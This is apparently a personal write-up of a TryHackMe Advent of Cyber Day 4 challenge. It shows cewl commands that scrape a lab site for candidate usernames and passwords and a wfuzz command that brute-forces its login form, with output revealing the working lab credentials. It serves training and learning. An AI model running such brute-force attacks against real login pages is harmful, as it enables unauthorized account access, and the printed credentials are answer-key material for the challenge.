Challenge Information
- Advent of Cyber Day 4
- THM link here
Explanation
This challenge focus on 2 main tools which are cewl and wfuzz. cewl is a tool that generates credentials based on the information retrieved from website while wfuzz is a brute-forcing tools. To solve challenge, The first thing to do is to get a list of credentials using cewl.
1
2
3
4
5
cewl http://10.10.166.184 -d 2 -m 5 -w out.txt --with-numbers
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
cewl http://10.10.166.184/team.php -d 0 -m 5 -w out2.txt --lowercase
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Based on the commands, the first one is trying to generate password while the second one is trying to generate username based on the website. After getting the potential credentials, The next thing is to brute-force using wfuzz.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
wfuzz -c -z file,out2.txt -z file,out.txt --hs "Please enter the correct credentials" -u http://10.10.166.184/login.php -d "username=FUZZ&password=FUZ2Z"
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.166.184/login.php
Total requests: 9361
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000006317: 302 118 L 297 W 4442 Ch "isaias - Happiness"
We managed to brute force it by using the credentials that generated by cewl. Since we have the login credentials, we could just login and get the flag.
Things I learned from the challenge
- brute-forcing using
wfuzz - generate credentials using
cewl